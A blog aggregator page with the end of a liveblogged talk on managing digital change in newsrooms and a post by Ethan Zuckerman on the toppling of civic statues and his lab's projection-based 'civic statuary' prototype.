Q: [nick sinai] I appreciate your comments about bringing designers, developers, UX into the newsroom. That’s what we’re trying to do in the govt. for digital services. How about data journalism.

A: Data journalism lets you tell stories you didn’t know where there. My one issue: We’ve reached a barrier: we’re reliant on what datasets are available.

Q: How many reporters work for print,, and

A: 250 journalists or so work for the Globe and they all work for all platforms.

Q: Are different devices attracting different stories? E.g., a long enterprise story may do better on particular devices. Where is contradiction, nuance, subtlety in this environment? How much is constrained by the device?

A: Yes, there are form-specific things. But there are also social-specific things. If you’re coming from Reddit, your behavior is different from your behavior coming from Facebook, etc. Each provides its own unique expectation of the reader. We’re trying to figure out how to be smarter in detecting where you’re coming from and what assets we should serve up to you. E.g., if you’re coming from Reddit and are going back to talk about the article, maybe you’re never going to subscribe, but could we provide a FB Like button, etc.?

Q: Analytics?

A: The most important metric for me is journalistic impact. That’s hard to measure. Sheer number? The three legislators who can change a law? More broadly: At the top of the funnel, it’s how to grow our audience: page views, shares, unique visitors, etc. As you get deeper into the funnel it’s about how much you engage with the site: bounce rate, path, page views per visit,time spent, etc. Third metric: return frequency. If you had a really good experience, did you come back: return visits, subscribers, etc.

[Really informative talk.]

The post [shorenstein] Managing digital disruption in the newsroom appeared first on Joho the Blog.

by davidw at April 14, 2015 05:39 PM

Ethan Zuckerman
The Civic Statuary Project

The University of Cape Town removed a controversial statue of British colonialist Cecil Rhodes last week, after a month of student protests. Rhodes, who build the De Beers diamond empire, was an unrepentant imperialist whose wealth came from purchasing mineral rights from indigenous leaders and turning their territories into British protectorates. Under his rule in Cape Colony, many Africans lost the right to vote, a step which some scholars see as leading to enforced racial segregation in South Africa. While Rhodes made major donations to charitable causes – including the land the University of Cape Town sits on – his legacy is a challenging and difficult one for many South Africans.

A month ago, student activist Chumani Maxwele emptied a bucket of excrement on the Rhodes statue on the UCT campus. Subsequent protests against the statue including wrapping it in black plastic, smearing it with paint and covering it with graffiti. When the statue was pulled down, protesters beat it with belts and chains as it was hauled away.


Protests against the Rhodes statue received widespread support online, spawning the hashtag #RhodesMustFall, and inspiring other attacks on statues throughout South Africa. Statues of Queen Victoria and George V have been splashed with paint in Point Elizabeth and Durban. Statues of Afrikaner leaders and Boer War generals have been targeted as well. The attack that’s received the most international attention was a defacement of a statue of Mahatma Gandhi in Johannesburg, part of a protest that argued that the revered activist had worked with the British colonial government in South Africa to promote segregation.

Statues are one of the oldest forms of figurative art, dating back at least to 40,000 BCE with the Lion man of the Hohlenstein Stadel. In ancient Egypt, Pharaohs were memorialized with Sphinxes, massive limestone statues that dominated the landscape – we might think of these as the first civic sculptures, public art designed to honor religious and political leaders. Fifteen hundred years later, Greek sculptors- who had previously portrayed mythological figures – began honoring political leaders in bronze and marble.

Statues erected for civic reasons are also torn down for civic reasons. Seven days after the Declaration of Independence was signed, General Washington’s troops tore down a statue of King George III that had been erected in 1770 in Bowling Green, a small greenspace at the southern tip of Manhattan Island. The decision to tear the statue down was practical as well as symbolic – the two tons of lead in the statue were turned into 42,000 musket balls for the use of revolutionary soliders. Statues of leaders who’ve been ousted are often torn down, sometimes spontaneously, sometimes with the help of conquering armies.

US marines pull down a statue of saddam hussein on
Statue of Saddam Hussein in Firdos Square, Baghdad, torn down by the US marines.

It’s not only political leaders whose statues fall. In the wake of revelations about widespread sexual abuse by Penn Statue football coaches, a statue of Joe Paterno was removed by the university. The decision to remove the Paterno statue has been controversial, and a crowdfunding campaign has raised funds for a new Paterno statue in downtown State College, Pennsylvania, two miles from the university campus.

While statues are one of the oldest forms of civic artwork and technology (their only rival for age is the cave painting), they still gain attention when people erect them today… especially when they are erected without permission. On April 6th, a small group of artists placed a bronze-colored bust of NSA whistleblower Edward Snowden atop a pedestal in Prison Ship Martyrs Monument in Fort Greene Park, Brooklyn. By mid-afternoon, the bust had been covered with tarpaulins, and later that day, it was removed entirely. The bust took over six months to construct, and cost tens of thousands of dollars to design and deploy.

snowden projection

Frustrated by the brief lifespan of the Snowden statue, The Illuminator Art Collective – a group of artists not related to the original sculptors – projected a hologram-like image of Snowden on a cloud of smoke behind the pillar. The Snowden projection is part of a tradition of artistic intervention that has used projection to create provocative art in public spaces. Polish-American artist Krzysztof Wodiczko has used projections to bring statues “to life”, turning static war memorials into active spaces for the discussion of war and peace.

(Projection is a powerful tactic for civic activism – see Hologramas Por La Libertad, which is using projections of street protests against the side of the Spanish parliament to make a point about new laws that strongly restrict public protest. But this is a story about statues, not projections, so we’ll honor the effort and move on.)

A few days before the Snowden statue and projection, we found ourselves discussing civic statues in our lab, Center for Civic Media. The issue came up not because we were having a deep discussion about the nature of statuary, but because we moved a worktable revealing an open area that might students and I thought might be perfect for a statue. We began talking about the idea of a statue that could be rapidly deployed, which could change to honor different people at different times, and which would inspire discussion about why someone was being honored as a civic hero.

We built a prototype civic statue using an old projector and a sheet of optical rear projection acrylite. (The Media Lab is the sort of place where sheets of acrylite are just kicking around and folks like Dan Novy are generous enough to lend them out.) For our demo, I decided we would honor Professor Attahiru Jega, chairman of Nigeria’s election commission, which had just conducted a presidential election widely regarded as free and fair in which the incumbent president was defeated. Nigerians on all sides of the political spectrum honored Jega’s role in administering a fair election, and “Jega” began to emerge as slang for being chill, calm and avoiding conflict: “20 people showed up for dinner at his house unexpectedly, but he was totally Jega about it and sent out for chicken.”

This week is the Media Lab member week, where sponsors come to visit our labs and see our projects. We decided to rapidly prototype the statue so we could show it off, with some simple design constraints:

– It should be quickly deployable, easy to set up and move
– It should be relatively inexpensive (our target is a standalone programmable statue that costs under $500)
– It shouldn’t require a specialized photo shoot – it should use available imagery
– It should prompt discussion within the group hosting the statue about who should be honored and how

As we thought about who to honor, I came across this tweet from my friend Liz Henry:

As it turns out, that brave and awesome man was Feidin Santana, a 23-year old Dominican immigrant who heard Walter Scott being tazed and captured footage of his shooting by police officer Michael Slager. As with Prof. Jega, we found an image online, masked it and added text to form a plaque. Savannah Niles, who is working on a project to build smoothly looping animated GIFs that she calls Glyphs, went a step further and built a statue of Santana that moves, subtly.

savannah from Ethan Zuckerman on Vimeo.

Niles explains what a Glyph is, showing the statue of Feidin Santana

Our prototype raises as many questions as it answers. Some are practical: Should this be a single unit, perhaps using a mirror to bounce the projection onto the screen? Will this work only in dim, interior spaces? Others focus on the community aspects: How do we decide who to honor? We held a brief email exchange about who we might feature, and quickly realized that there’s a real problem when people disagree about who should be honored. We’re working on a system that will allow people to propose candidates and select people to be honored by acclaim, rather than by fiat, which is how we selected Prof. Jega, Feidin Santana and feminist scholar and activist Anita Sarkeesian as our first three honorees.

As we work on this project in the long term, I’m interested in taking on a richer and deeper set of questions: What are statues for in a digital age? Is the rapid deployment and impermanence of these statues a feature or a bug? Can new types of statues help challenge long-standing gender and racial disparities in who we honor?

The civic statuary project is an experiment, and we may or may not continue it beyond showcasing it at this members’ meeting. But this question of how societies honor their civic heroes is a rich one, and I hope this experiment – and this blog post – opens conversations about who and how we memorialize.

by Ethan at April 14, 2015 05:28 PM

Feeds In This Planet